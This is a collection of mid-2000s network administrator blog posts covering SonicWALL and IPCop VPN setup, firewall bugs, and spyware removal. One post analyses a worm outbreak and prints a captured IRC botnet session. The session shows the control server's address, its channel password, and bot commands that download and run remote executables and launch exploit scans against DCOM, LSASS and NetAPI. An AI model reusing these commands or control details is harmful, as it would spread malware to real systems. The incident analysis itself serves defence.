Now clidk the Advanced tab. There are some things here you may need later. I don't like the thought of NetBIOS going over a routed network. Some folks might need that option though (for lousy name resolution or old network printing). Also, its a good idea to check the Keep Alive option ... but do that later. One of the lessons I have learned is that if you run a Keep Alive on a bad configuration, your log will fill up with a bunch of failed attempts. Rather, wait until this tunnel is coming up successfully and make a note to come back and add this option. The Keep Alive will maintain this tunnel even when there is no traffic running across it. I like to keep tunnels up all the time, so that when people need to send traffic across it - the tunnel is up and ready.

Now comes the fun part. Click OK on the SonicWALL policy to save it away. Note that it's all ready "Enabled". Watching this screen will get you nowhere. It does not refresh, ever. So head back over to the Linksys device now in a different tab/window - and click that Enable button at the bottom of the policy window. Now, on the SonicWALL you can click the VPN > Settings option on the left which will refresh this screen. Do you have a "green light" on the SonicWALL's policy? Does it show an active connection in the lower portion of the window? Great! No green light? You have problems ... keep reading.

Regardless of whether or not it worked, you had better read the logs. I find that the SonicWALL logs are far better (at least in this match-up). So click "Log" on the SonicWALL and see what you have. A successful policy would look like this ...

Note that the first line in the log, is the last thing that it recorded. Your policy notes should end with "Adding IPSec SA" as you see in the illustration. If it all looks well, try to run some traffic through the tunnel. Bear in mind, you cannot ping the internal interfaces of the two devices. That is, you cannot ping the Linksys's LAN IP from the SonicWALL (or vice versa). I'm really not sure why this is, but I think it may have to do with the way that these devices are terminating the tunnel from end to end. So instead, try getting onto a PC connected to one network and ping a PC at the other end. If that fails - check the logs for errors, and also remember to disable personal/Windows firewalls! ;-)

Troubleshooting/Caveats
I had some STRANGE problems when I first attempted this. I hope this helps someone out there.

1) The SonicWALL reports that the settings don't match, but they do! - I had the SonicWALL at one point tell me that the DH groups were different, when they were in fact matched. There was no convincing it otherwise, and the solution was to delete the policy, RESTART the SonicWALL, and start over. Don't waste your time trying anything else.

2) The tunnel is up, but traffic is not passing across it. - Check that the "remote" network on the SonicWALL side is configured as a "VPN" zoned object. You can find this setting in Network > Address Objects. If you accidentally made it a LAN or WAN object, you should go back to your policy, choose a different object (or create a new one) and name it something different. Then, go back and delete the one you made with errors.

3) The Linksys is not even starting the tunnel connection! - Did you put spaces in the policy name on the Linksys device? If you did, delete the policy and start over from scratch. Also check ALL of your settings and match them up. Look at the logs at *both ends* for clues, but know that the SonicWALL will be more helpful in determining the problem.

One thing I will say in favor of Linksys, their Log is "detachable" where SonicWALL keeps theirs glued down. What I mean is that you can create a Log "pop up" from the Linksys and keep that window aside while you troubleshoot. Here is how ...

FIRST - Disabled your policy on the Linksys to stop it from logging junk. Then, click Administration > Log. You need to enable the Local Log as it is not turned on by default. Then make sure you Save Settings. Once that has been done, you can click the "View Log" button and you get a nice little logging window. It's not very big, and it doesn't refresh itself. So you will have to refresh it, and actually turn through the pages yourself. Also, the messages you will get will only make sense to someone who has worked extensively with OpenSWAN. Yet, pasting these errors in Google may uncover some good hints.

Once you have enabled your logging and you have your window up, go back and click "Enable" on the policy. Then refresh your log, and turn through the four or five pages of messages. Good luck!! ;-)

If you are attempting this and get stuck, feel free to comment, share your advice, point out my wrong doings, etc.

-Steve Ballantyne

Google Ads Have Nudity?

2007-01-28T07:41:00.000-08:00

For a while now I have noticed a growing trend of pornography advertisements. I will be surfing along, visiting web sites that I have been on and off of for several years and then *boom* - you've got bare chested ladies down the side of your screen.

It wasn't until a month or so ago that I realized something was wrong. I was downloading chipset drivers for a friend of mine from VIA's website, www.viatech.com. There in the right margin was a couple sets of naked breasts. This really bothered me. Would a reputable company like this really stoop to that level for revenue? Looking at the page source it appeared that what I should have been seeing was Google Ad's, but they had been replaced somehow. Was this some sort of cookie hijacking? I got busy working on the project at hand and never investigated it further.

Today my browser crashed. The error message indicated that some awkwardly named dll had gone south, and the browser had to shut down. I have seen this before in earlier weeks and I just wrote it off to a bad component in Internet Explorer 7. But this was the second time today and I intended to get to the bottom of it. The object was called ~DP1C9.dll and when I performed a search on my hard drive for it - I turned up nothing. Next I went into the browser settings starting with "managed add-on's".

Oh, this was not good. Here I had somehow installed a "browser helper object" without a name. Surely if this was legitimate it would have been branded by the publisher. I disabled it immediately, and restarted Internet Explorer.

I was sure that I had somehow installed something nasty. What bothered me is that I have had this for probably a few months and nothing stopped it from installing. For that matter nothing ever caught it and told me about it! I checked my Symantec Antivirus definitions. They were up to date. But this seemed more like spyware, and Symantec has never been really good with detecting and removing that. More likely, this is something that Windows Defender should have stopped. For the sake of finding a cure, I went out and downloaded the latest and greatest copy of Windows Defeneder from Microsoft. I let it update to it's latest definitions and then performed a full scan.

Right now I am wondering why I waste the system resources on this product when it obviously doesn't work. I would have to take the law into my own hands.

First I would have to figure out where this little devil was hiding on my system. That ugly and awkward "manage add-on's" window was of no help to me. I ran reg-edit and searched for this object by it's object name.

Here it is, so that you won't have to retype it like I did. By the way, I would like to thank the engineers of Internet Explorer 7, for not allowing me to copy and paste anything from that window.

{598F4775-6FB6-477B-9842-E0426824E077}

Incidentally, if you came to this posting because you found the above object ID on your system, you are infected. Read the rest of this for removal instructions.

I found a couple of keys right away. This one told me exactly where the bad dll file was hiding out. Notice that this is in a location that normal users like you and I are not supposed to tread. Therefore to find it with a "Search" I would have had to of performed an advanced search and looked for "hidden files", "system files", etc.

Heading out to that location on my drive I found the dll file(s). Even with the browser shut down, and the objects disabled I was not allowed to remove these. I'm betting I would have to boot into safe mode. They are welcome to stay I suppose since they will no longer have any attachments to the browser when I get done.

Next I got to work on removing all of the registry keys that involved this string. That was actually pretty easy. I just ran "regedit" and did a "Find". For every key I found with the above mentioned object ID, I deleted it. Then, I reopened Internet Explorer and made sure that the "browser helper" object no longer appeared in my "manage add on's" list.

Now I just needed to prove my theory. Was this little dll file what was actually turning all my Google Ads into pornography? It wouldn't take much to find out. I went out and visited the site that I last remember seeing this problem with. YOu might try this too. Below is the URL to a VIA Forum. Scroll over to the right corner, and check the Ad in the top right. You *should* see Google Ad text (not bare chested ladies).

http://www.viaarena.com/default.aspx?PageID=5&ArticleID=497&P=6

To really make my point, I hopped onto my wifes computer. She has had this problem too. First we brought up the VIA Forum with the object enabled. She saw the pornography. Next we disabled the object, restarted the browser, and reloaded the page. Now she was seeing the Google Ads as they were meant to be.

I have no idea how this object got installed, but I have heard from other folks that they had this same problem. If you have a story to tell, drop me a comment.

-Steve Ballantyne

New Virus Attacks on TCP 2967

2007-01-17T06:00:00.000-08:00

I was settling in Thursday for a couple hours of video games with my kids. We had just got back from Karate when my pager starting going off. One, two, three pages within minutes of one another. I would later find out that I had three different emergencies from different people. The first of which would take me a good hour and a half to chew through.

I connected into the SonicWALL of a newly added customer who was complaining that things simply "didn't work". My initial throughts were that the engineer who had configured the device earlier that day had made a mistake somewhere. It didn't take me long to find the problem. The SonicWALL had been configured in Transparent Mode allowing them to have a few servers on their DMZ with public addresses defined on them. The Transparent Mode requires that you create an object for the range of addresses, and a zone to put it in. The object was created as a "WAN" object, but had been put into a "LAN" zone. I have seen this before. The last time I had seen it was when I had made this same mistake. Remembering that simply changing the object didn't work, I reassigned the interface to a 192.x.x.x address. Next I deleted the object, and created a new one for the correct zone. Just for good measure, I restarted the SonicWALL.

Now traffic flowed perfectly - for about a minute and a half. "This is the same problem we had before we put the SonicWALL in", says the network admin. Next I went to work looking for signs of funny business. I brought up the connections list on the SonicWALL and found that it was "topped out". This particular SonicWALL supports up to 6,000 or so concurrent connections. They had hit that mark. Something was definitely wrong. The connections were all on TCP port 2967 and to what seemed like completely random hosts. The first octet was the same as the customers, but the remaining three were random numbers. This would make sense for a virus and we have seen some that attack NetBIOS this same way. It calculates a subnet mask based on your present address. That it, it assumes that if you have a class A address, it can access all the same hosts on that class A network. Because this customer had conigured a 24.x.x.x address, it was attempting to connect to all 16.7 million hosts to infect them.

Now we were getting to the root of the problem. "You have a virus", I say. "No, we are being attacked!", says the admin. I ran a packet trace on the activity. "No, you have a virus. I can see these connections are clearly coming from you".

The customer went on to complain that they didn't understand why the SonicWALL could not withstand the attack. I tried to explain that all devices have a well known limit of the number of connections that they can support, which is based on the amount of RAM that the unit has to spend on these connections. The customer didn't want to hear it. Looking for a quick solution, they yanked the SonicWALL and went without it. The effect of which was that they continued to try and spread the virus instead of fixing the problem.

Yesterday this same virus emerged again. This time, the customer gave me some time to analyze it, and attempt to trap it. I went right work disabling the initial attack. I created two acces rules for LAN to WAN traffic, discarding all TCP connections on ports 2967 and 2968. The "discard" was important, as a "deny" would still waste some time processing the connection and would keep the firewall at 100 percent CPU utilization. Next I went into the "super secret diagnostic page" of the SonicWALL (firewall.ip/diag.html) and flushed all connections. Back to the monitor, I was a little surprised to see that all the connections were full again. This time with NetBIOS ports (135, 139, 445). So I created a second LAN to WAN discard rule for the built in NetBIOS group. Oddly enough, that did not stop the attack, as the SonicWALL's built in NetBIOS group does *not* include TCP port 135. Rather than create a new group, or attempt to change a built in group ... I simply added one more rule. Another flush of the cache, and all was fine.

An hour or so later, I was back on the phone with the admin there. "These two laptops that were causing the trouble have a few hundred virus's on them", said the admin. Then I hit her with some further bad news. Both of the infected PC's were presently connected to an IRC server in Malaysia - doing "who knows what". I immediately dropped in another discarding rule this time stopping any traffic destined for this Malaysian server.

But curiosity got the best of me, and before I dumped these connections I ran a packet trace on the virus to see what it were doing. The connections were being made to a server 203.121.79.138 on port 51555. Here is what it revealed (the data yanked from the capture using Ethereal).

PASS r0flc0mz
NICK [P00|USA|64502]
USER XP-2224 * 0 :TEACHLAP06-12
:SSH 001 [P00|USA|64502] :MySQL  [P00|USA|64502]!~XP-2224@70.60.35.170
:SSH 376 [P00|USA|64502] :
:[P00|USA|64502] MODE [P00|USA|64502] :+i
MODE [P00|USA|64502] -x+i
JOIN #bpe2# p00n3d
:[P00|USA|64502]!~XP-2224@70.60.35.170 JOIN :#bpe2#
:SSH 332 [P00|USA|64502] #bpe2# :!t kill all -s|!sftp 166.104.216.37 2755 1 1 2.exe -s|!asc netapi 30 3 0 -b -e -h -s|!asc sym 30 3 0 -b -e -h -s|!asc dcom135 30 3 0 -b -e -h -s|!asc lsass445 30 3 0 -b -e -h -s|!asc asn139 30 3 0 -b -e -h -s|!ip.wget http://www.milites-liberi.de/images/is6.exe c:\3i3o.exe 1 -s
:SSH 333 [P00|USA|64502] #bpe2# 10:30 PM 1168912264
:SSH 366 [P00|USA|64502] #bpe2# :End of /NAMES list.
MODE #bpe2#

This was *not good*. I could see that the virus was successful in getting a connection to this server which seemed to be helping to get other virus's downloaded and installed to the infected PC. I just had to try it myself, so I made a connection to the server with a terminal based IRC client (on the specified port) - joined the channel, and had a look around.

09:19 -!- Topic for #bpe#: !t kill all -s|!sftp 166.104.216.37 2755 1 1 2.exe
          -s|!asc netapi 30 3 0 -c -e -h -s|!asc sym 50 3 0 -a -e -h -s|!asc
          asn139 30 3 0 -b -e -h -s|!asc mssql 30 3 0 -a -e -h -s
09:19 -!- Topic set by 10:30 [] [Wed Dec 31 19:00:00 1969]
09:19 [Users #bpe#]

I was hoping to walk into a channel and see a wide list of infected users. Then I could possibly start performing "whois" lookups on the infected hosts and attempt to pick off anyone else who might happen to be one of our customers. Those hopes were dashed when it became clear how well the server was locked down. Only IRCOP's would be able to see other users. Connected users, would only see themselves in a channel.

While all this was happening, I was yelling over the wall to our application developer. He was rushing to build some new SQL queries that would target 1) excessive connections on TCP 2967, and 2) any connections made to this Malaysian server. It would reveal about 5 to 7 more customers that were experiencing this same virus.

By now you may be asking "why did this virus slip through the cracks?". The answer to that question has always been the same: "updates!". When you don't update your Antivirus products, you pay a hefty price for it. This particular virus emerged in late December and has been spreading in high numbers in the past few days. It was able to spread thanks to a flaw in Symantec Corporate Antivirus products that has been patched since May of this past year. So why didn't these customers get the patch? Some had just not been updated in some time, such as roaming users on laptops who don't often connect to the business network. Others had simply stopped paying for the product. What many people think is "why should I keep paying for this product when the updates are free?". They raise a good point. Symantec (Norton) will provide you free updated "definitions" until the end of time. They will not, however, provide you free "product" updates. Old virus engines do not handle new virus definitions well, if at all.

If you don't update your antivirus engine, your new updates are only effective against old virus's. Now apply logic to that statement and ask yourself "when was I last infected by a 2 year old virus?".

Another good question is: why couldn't I find any good information about this virus? Answer: Symantec would rather not make headlines about this, as it is a virus that attacks a flaw in an antivirus product. Oh the irony. Some credit due to Symantec, as they patched this flaw when it was revealed. That's about the best thing you can ask of the vendor. I was later sent a link from my boss which gave some explanation to what we have seen over the past week ...

Persistent zombie attacks target Symantec corporate software

Keep on trucking folks! If you found any of this helpful, drop me a comment,
-Steve Ballantyne

SonicPoint's Eat UDP 14443 Connections

2007-01-03T13:14:00.000-08:00

A while back I had a student call me from their sorority house reporting problems with their SonicWALL. The installation had started as one small wireless device/router, the TZ50W. When the signal seamed too weak to cover the entire house, they moved up to a slightly more powerful SonicWALL TZ170W. When that didn't work, we paid them a visit. It turns out that the house was gigantic and there was no chance that the wireless signal would flow through the 100+ year old plaster walls and solid wood floors. The solution was clear - we would need SonicPoints!

SonicPoints allow you to create one wireless profile (SSID, encryption scheme, etc) and then plug in a slew of wireless access point devices that use it. The catch is, of course, that you have to run physical cables between each SonicPoint and the one SonicWALL device (sometimes defeating the point). The good news is that this is a great solution for a multi-floor home like the sorority house - and if power is a problem you can purchase a POE switch and plug your SonicPoints into that.

Just when you think you are done troubleshooting, I got an emergency phone call. The SonicWALL was dropping connections left and right, and many students in the house were reporting "no Internet access". I was able to connect into the SonicWALL and have a look. What I expected to find was one or two students running excessive filesharing, and eating up all the active connections of the main device (fairly common in residential University settings). What I ended up finding was that the SonicPoints themselves were running the SonicWALL out of active connections! It looked something like this ...

In the case of the sorority house, there were literally thousands of UDP connections on port 14443. They were clearly coming from the SonicPoints. While I knew that the SonicPoints would open some line of communication with the SonicWALL for profiles and such, I knew that this couldn't be normal operation. I had them reboot the SonicWALL and it went back to normal. But only a few minutes later the connections started appearing again.

A call into SonicWALL reveals "this is a known issue". Also an apparently "undocumented known issue" with the current Enhanced Firmware, version 3.2.0.3. The fix to this problem is to "roll back" to earlier firmware (nothing I ever like to do). But alas, I rolled back the firmware to 3.2.0.0 and the extra connections went away. Case closed?

Today we had another customer call in for unrelated problems. They too have SonicPoints. They too use Enhanced Firmware. They too have several hundred UDP connections opened with their SonicPoints. I wonder who else has had this problem? Have you? Leave me a comment. Hopefully SonicWALL will fix this with the release of version 3.5.

-Steve Ballantyne

Candy Security Opens It's Virtual Doors

2006-12-27T11:01:00.000-08:00

Back in 1997 or so I started building FreeBSD firewalls and proxy servers for friends and business partners. To my surprise, many of those systems ran until their hardware fell apart(literally). As those systems died nearly all of them were replaced with off-the-shelf commercial products. I was no longer in the business of building firewalls and I could not easily compete with the cost advantages of the commercial options. For a small business, your average wireless router does quite well for NAT and DHCP. At the time, the cost of $100 or so was quite reasonable. For the larger businesses - there are larger needs that include SPAM filtering, Antivirus, Intrusion Detection/Prevention, and more. The answer for them would be a Cisco device or a competitive product (such as a SonicWALL).

After kicking around a SonicWALL for a few months for my home business, I just had the feeling that I could do better with hardware that I had laying around. I was looking to replace not only the NAT functionality of the hardware, but the other services as well. It didn't take me long to discover IPCop. IPCop is an open source firewall solution with a Linux core. It's easily installed, and even easier to configure through web based management. For the hardcore enthusiast there is a growing collection of compiled add-ons for the product which include ClamAV (Gateway Antivirus), Squid (for proxying), Squidguard (for content filtering), and even Snort (for Intrusion Protection). Mix all those together, and you have yourself a very affordable unified threat management system (a term I do not throw around loosely).

It wasn't long before I started deploying my IPCop firewalls to friends, family, and small business owners (many out of charity). The hardware, while never fantastic, has always been adequate for their use and has all been purely recycled components. In some cases, I have taken a companies retired desktop PC's and turned them into managed network security solutions for them. Aside from saving a ton of money on the cost of hardware and security services, we have kept the environment from having to digest a pile of toxic components.

There was only one thing missing. I had never officially given the company a title. While working on the website, that seemed necessary. While some of you may still refer to it as "Steve's firewall business", we will be putting something more pleasing on our business cards. The official title, as the subject implies, is Candy Security. I have been tossing the name around for nearly a year and I even registered the domain name some time ago in preparation. I have most recently built a website, and today it went live!

You will have to excuse the advertisements glued to the top. I opted to get "free hosting" until I had something to put up. Now that it's up, I have to have my account converted from a free account to a paid hosting account. The last time I did this with GoDaddy, it required deleting and re-creating my account.

Hope you all like the new site. For present customers (or other interests) I created an area that you can use to contact me from the website. Obviously, if you are having problems and need immediate assistance you can still call us.

http://www.candysecurity.com

-Steve Ballantyne

Bad Attitudes Have No Business In the IT Business

2006-12-27T10:22:00.000-08:00

I thought that I would post something that's non-technical today. I have had a couple of dealings with customers these past few days that were less than pleasant. One of which I knew from days past. With that, I have thought I would write up a few words on bad attitudes in IT.

It seems that throughout the nineties there were a lot of companies that had administrators and IT personnel that nobody wanted to talk to. In some cases (that I myself have witnessed) there were overpaid administrators who literally sat in a dark room most of the day and would throw a fit if anyone bothered them for assistance. In my days as an IT instructor I would often cross paths with some of these folks and I wondered why anyone would employ them.

At some point in the history of information technology it seems that we accepted that for someone to be smart and helpful in the area of computing, it should be expected that they would come with personality flaws (or even hygiene problems). Into the late nineties and early millennium many of these administrators found themselves unemployed. The job market for information technology shrank. Or, did it? Perhaps as the economy suffered, businesses of all sizes had to cut back and see who they could do without. Could they live without that mean guy who sits in the dark playing video games all day? They were willing to try.

While my training business in was booming in mid 2005 and I had no shortage of work, I was running into old colleagues and sometimes students who said that they had been trying for weeks or months to find work. What was it that they were missing? A good attitude for starters (and better hygiene for those others). Good attitudes will always make up for what you may be lacking in the area of experience. While many will say that it's not "what you know" but "who you know", I still contest that it's how you treat people that determines if you are going to get a job.

I have also been amazed at what a small world it is when it comes to information technology. I still run into people that I worked with ten or more years ago. Almost all of those people that I bump into are still in the same field. I am assuming that they are all glad to see me. But when I run into an old colleague that I had a hard time with, I will not exchange cards. In such a small world there are few rivers. Nothing will kill your career faster than burnt bridges. And nothing accelerates bridge fires like a bad attitude!

Remember to slow down, relax, and be nice to the people you work with. Be even nicer to the people that you help, or the people that help you. Compassion and kindness are instruments of business.

-Steve Ballantyne

Building a site-to-site VPN tunnel between SonicWALL and IPCop

2006-12-10T08:10:00.000-08:00

To perform this task, I used:
A SonicWALL TZ170 Running SonicOS Enhanced 3.2.0.3-54e
A PC running IPCop v1.4.11, with the built in VPN functionality

SonicWALL is becoming ever more popular as a good solution for the small to mid-sized business due to its lower TCO over products such as Cisco. In the same regard, IPCop has grown in popularity for its open source nature, and its large list of features. Therefore, I thought it would be interesting to see how difficult it might be to merge two companies using these very different products. In the end I can say, “not too difficult at all”.

Some things to remember:
* You must have two different networks, with different network ID’s. That is, if one company has a network ID of 192.168.0.0/24, than the other side cannot also be 192.168.0.0/24. This will be a routed network. You cannot route between two networks, that are actually the *same* network!

* SonicWALL is a commercial product and is backed by toll free phone support (which varies by product and status). Help is most certainly guaranteed. IPCop is open source. That means that your support comes in the form of forums, IRC, etc. Also note that the use of open source software comes with an agreement. Make sure that your company or organization is permitted to use open source software.

Step #1 – Set up the SonicWALL side of the tunnel.
Log into the SonicWALL Administration page. Click “VPN” on the left side, and ensure that you are now looking at “Settings”. Now under the “VPN Policies” click the Add button.

Leave the authentication drop-down at its default. Name your policy whatever you wish. You can use spaces here, it doesn’t matter.

For “Primary Gateway” you need to enter the IP address of the IPCop firewall. If this address was obtained via DHCP and will be changing, then you will need to set up Dynamic DNS for that box (Google for help on that). The SonicWALL *will* accept a hostname here instead of an IP address if DDNS is in use. For the “Secondary”, you can enter 0.0.0.0, or if left blank, the SonicWALL will enter that for you. This would be used if you had a “backup VPN” in place to another box in case this VPN fails.

Enter a secret password into the “Pre-Shared Key” area. You will need to enter this same password on the IPCop firewall. The longer the password is, and the more obscure the characters are (!@#$%^, etc), the better your encryption will be. So be creative.

For your “peer ID’s”, I would typically recommend using the default which is “IP Address”. And normally you would leave the fields blank. But, SonicWALL and IPCop did not handle that well at all. I suggest using something textual such as “E-Mail addresses”. The idea here is you would use a contact at the SonicWALL site for the SonicWALL side, and the address of an employee at the IPCop side for the IPCop settings. It doesn’t even have to be a real e-mail address, but whatever you enter in these boxes, must match the other side when we are done (local to remote, remote to local).

When done, it will look something like the illustration below. Click the Network Tab to continue.

Things may get tricky here depending on how complicated your network is. We will assume that you have one standard reserved network address on your local network. In our case, the SonicWALL’s network is known as “192.168.199.0” with a subnet mask of 255.255.255.0. We could create a new “object” for that address, but instead used the default object, “LAN Primary Subnet”. If you have a whole slew of networks, or you want the wireless network to be reachable through the VPN, etc – I would suggest going through this once for one network. When you have success with one network, go back and add the others. Each end of this tunnel must be aware of the other ends networks!

For the Destination Network, we will need to create an object. So click the drop-down under “Choose a network from the list”, and then select “Create new address object”. You can name this whatever you want, but for the sake of other administrators – or yourself at a later date – use a sensible name (like the network ID itself).

Zone Assignment MUST be set to “VPN”! Next, choose “Network” as the type, and enter in the network ID information for the IPCop side of things.

Click “OK” when done, and you should have something like this …

Now, click the Proposals tab. We will have to make a few changes here to find a middle ground between our two different ends of this tunnel.

For Exchange, choose Main Mode. For DH Group, choose “Group 2”. Note that we also want Group 2 down below, but we can’t change that (and don’t need to) unless “Perfect Forward Secrecy” is enabled. For Encryption, go with “3DES” (aka Triple DES). Authentication, “MD5”. Could we go with better encryption? Probably. But SonicWALL tends to have a harder time working with other devices when using stronger protocols. If you want this to work well, stick to this path. For lifetime, go with the default. We will match this on the other side. For those keeping track, 28800 seconds translates to 8 hours.

When you are all done here, it should look like this …

On the Advanced tab, there is not much that will need changed here. I like to enable a “keep alive” on one end of the VPN tunnel. This will keep the tunnel up, even when no traffic is being passed through it. In most cases, you want that kind of functionality. The alternative is a tunnel that is built “on the fly” when users start trying to send traffic through it.

You may also want to enable NetBIOS. I often do for my customers. But if this was my network, I wouldn’t want Windows broadcasts going through my tunnel. This should be a routed network! Theres a good reason that broadcasts are not routable. Additionally, if you enable that here, you may be in trouble with how the IPCop handles it at the other end.

Leave this other options alone. You’re done here. Click “OK”.

The SonicWALL will go ahead and enable this policy for you. Since only one end is complete, you should disable it. Find the little checkbox under “Enable” and uncheck it.

Now, you are halfway there.

Step #2 Configure the IPCop side of the tunnel.
Connect to your IPCop’s web administration. This can probably only be done from the LAN side, unless you have enabled remote administration. Remote administration for an IPCop box is tricky, as it entails setting up SSH – and configuring an SSH tunnel at the remote end. Again, use Google or the Ipcops.com forums for help on that.

From the admin interface, click “VPN’s” and “VPN’s” as the only choice. If you are an OpenVPN user as well, you should be happy that these two seem to work together without any problems.

On the “Global Settings” screen, enter the IP address or hostname of this IPCop firewall if it’s not all read there. For the MTU, you will need to enter “1500”, or you will have serious problems. The SonicWALL defaults to 1500. Do not enable the VPN yet. Click “Save” toward the lower right of these settings. Smile.

Now scroll down a bit to “Connection status and control” and click the “Add” button lingering around the lower center.

We will be building a “Net to Net”, so choose that second option and then click “Add”.

For name, choose anything you want. But it must be one big word without spaces or special characters. For the “IPCop side” leave the default setting of “left” (this is an obscure reference to Open SWAN settings).

In the Remote Host box, enter the IP address of the SonicWALL. This is the “public address” which should be reachable from the Internet.

For “Local Subnet” enter the ID of this IPCop’s network. All ready in there? Good! Leave it alone. For the Remote Subnet, enter the SonicWALL’s network ID in the same fashion. Network ID first, then a forward slash, then the subnet mask (for us it was 192.168.199.0/255.255.255.0).

Leave “Dead peer detection” at its default, “restart”. If the VPN goes to hell in a hand-basket, it will drop and re-establish itself.

For “Options”, we will need to enter Local and Remote ID’s. As I mentioned earlier, these are textual. Normally, the IP address is used. But I had problems with that. My advice, use email addresses. You will need to put an “@” symbol in front of them.

So for Local ID, put in the address used as the remote “Peer ID” of the SonicWALL. Then for “Remote”, use the local “Peer ID” that you used on the SonicWALL. Be sure to put them in with @ symbols leading the address, but of course still plant the @ symbol in the address where it belongs (such as “@steve.ballantyne@gmail.com”).

The “Remark” is just a comment. Leave it blank.

For Authentication, we need to enter our Pre-Shared Key (the secret password). This should match what we used on our SonicWALL to a tee, or this won’t get off the runway. Before clicking “Save” at the bottom, scroll up and uncheck the “Enable” at the top. We aren’t ready to bring this up just yet! Now, click Save.

No errors? So far, so good. Scroll down to your new VPN under “Connection status and control” and find the edit button. It looks like a little pencil. Double check your settings for consistency.

Now scroll all the way to the bottom and click “Advanced”.

NOTE: In some areas, there will be two options set (such as Grouptype). That will only confuse the SonicWALL and make life miserable for you. De-select all but what we specify (if it’s darkened, or highlighted, it’s selected).

IKE Encryption: 3DES
IKE Integrity: MD5
IKE Grouptype: MODP-1024 (this equates to “Group 2”)
IKE Lifetime: 8 hours (you will need to change this)

ESP Encryption: 3DES
ESP Integrity: MD5
ESP Groutype: MODP-1024
ESP Keylife: 8 hours

Uncheck all other options at the bottom, including “PFS”.

It looks like the picture below … Click Save.

Before bringing up your tunnel, you should probably be ready to debug it. So SSH into the IPCop firewall, and run “tail –f /var/log/messages”. You will be watching your log running by. If it’s moving too fast, that indicates a busy network … which means your timing probably isn’t good for making network changes. ;-)

If possible, get the SonicWALL Administration web page open too and head into the Log area. Now we can be ready for any error messages that hit.

Enable the IPCop side first by checking “Enabled” and “VPN on Green” and clicking the Save button. You should see some stuff roll into your log. Let it settle down.

Now go to the SonicWALL, click VPN > Settings. Enable the VPN we created earlier. Watch the IPCop log now as it fills up with interesting stuff. This is not so easily read but should indicate a Phase 1, Phase 2 success followed by some confirmation messages.

Now, on the SonicWALL side, refresh your browser window. You are looking to see a “green light” on the VPN connection, as well as an active connection status displayed at the bottom. A green light does *not* indicate success. I have had many green lights that were actually crippled non-working tunnels.

On the SonicWALL, go into the Log and see what you have. You should see several messages, the last of which will be “SA Added” indicating success. No such luck? Start debugging.

The good news is that if it didn’t work, it’s probably just a mis-match in settings. The bad news is that there are a lot of things to look over and the error messages generally are not all that helpful. So check, double check, and re-check the settings at both ends. One small typo will blow the whole thing up.

To test your VPN you can (depending on your access rules) try pinging hosts. From the SonicWALL you can click System > Diagnostic and use the Ping utility. Do not try to ping the public addresses of the firewalls, and do not ping the private addresses of the firewalls themselves. The SonicWALL will not allow you to, and the IPCop will probably lie about where the reply is actually coming from. Rather, find a host on either end that will allow ICMP traffic and ping back and forth – and ping those.

Does it all work? Good. If you are have checked everything, and can’t seem to get things to work, feel free to contact me. Just know that you understand your own networks far better than I do, so a resolution may be difficult coming from someone outside.

Enjoy,

-Steve Ballantyne

SonicWALL's Zapchast Virus Issues

2006-12-02T07:16:00.000-08:00

Friday I got support ticket from one of our larger customers, Ohio State University. They were attempting to download and update one of their Symantec antivirus products but the SonicWALL was preventing the file transfer saying that it was infected with the "Zapchast virus". The support folks have access to their SonicWALL (while most of our customers do not). They knew that this was a false alarm and a mistake. So they went into the SonicWALL and disabled the antivirus from that zone. That ought to do it, right?

Wrong.

Here is one of my many complaints about SonicWALL products. When you identify something that isn't working correctly you should be able to easily turn it off, or make an exclusion. While SonicWALL's do give you the ability to exclude certain IP addresses from the antivirus feature, it doesn't work. That's right. You can add those addresses to the exclusion list and it will exclude them. Bit if you have one of these hum-dinger mistake signatures that feature simply "does not work". Next, I would normally recommend removing the antivirus feature from the network zone. That's Network > Zones, from the administration pages. Yet, remove it from the zone all you like. That won't work either.

The only sure fire way to stop the SonicWALL from blocking something like this is to disable the entire antivirus, anti-spyware, and intrusion prevention engines and then reboot the box. Obviously, that is not a viable solution for a University who is supporting thousands of simultaneous connections. Not to mention that this seems pretty unnecessary just to download a single file that you need.

I have had similar problems with intrusion prevention signatures. SonicWALL will write a new signature and put it out there, only to find that it's causing horrible problems and stopping all sorts of legitimate traffic. They will eventually get around to fixing or removing the signature but until an update is available you are in trouble. The difference is that you can disable an intrusion prevention signature. You can't disable a virus signature. You have to understand the logic in that. Intrusion detection is bound to have false positives. Someone may be trying to 'break in' to your network, but that could be a legitimate user trying to run some sort of cryptic report (which looks like an attack). Virus's on the other hand - are always virus's. It's not as if it "might be a virus, might not be".

I suppose the problem here, is that SonicWALL needs to admit that they make mistakes (often) and give us the ability to work around them. Until then we will continue to tell customers that "they are working on it" ... and we will hope that they actually ARE working on it.

Until next time,
-Steve Ballantyne

What's In a Name?

2006-11-28T08:17:00.000-08:00

In the realm of Microsoft, it seems that "name resolution" is always the answer to the question, "why doesn't this !@#&*^ thing work?". Crossing over into a career in Network Security I have found that I will never escape this problem.

The past two days it seems that about sixty percent of my problems have been with customers who are expecting name resolution to "just work". Take for example one of my SonicWALL owners who has recently built a VPN tunnel between two offices. I am always quick to tell them that "if you cannot access a resource by name, try it by IP address". For some, accessing resources by IP address does not propose any problems. For others, this is quite an obstacle. It's getting to be that most of my calls revolve around name resolution problems of some sort. Therefore, today I would like to cover ...

Why Name Resolution Doesn't Work over my SonicWALL VPN Tunnel

Did you enable NetBIOS on the Security Association? - Remember that NetBIOS is a broadcast mechanism. It has no business being sent through a routed network. A VPN tunnel is a routed network. You should edit the VPN Policy, head into the "Advanced" tab and look for "NetBIOS Broadcasts". You need to check that option at *both* ends of the tunnel when possible.

Have you tried the IP Helper? - This is a goofy fix. At this point, I would question what you are trying to accomplish here. Remember that Microsoft has made several attempts over the years to banish "broadcast name resolution" from networks in favor of DNS. I don't want to get up on my soapbox and start yelling at you though. So you might try this - it fixes quite a bit.

Go into Network > IP Helper and first enable the helper, while selecting NetBIOS below it. You will need to "Apply" for that to be effective. Next, you will need to create TWO policies. One for each directional flow of traffic. That is, if you were doing this for a remote user VPN (WAN GroupVPN) make one that says "source: VPN DHCP Clients, dest: Firewalled Subnets", and then reverse it. Like this ...

Use Your Own DNS Server - If you have a DNS server at one end of this tunnel, consider using it for clients at the other end. What do I mean? Imagine "network A" has a DNS server which Active Directory uses. In fact, the Active Directory server is almost always also the DNS server for smaller businesses. That server should resolve the names of *ALL* your internal clients. It should also have "forwarders" configured so that when you ask it who http://www.google.com/ is, it will send that request to a DNS server on the Internet for an answer.

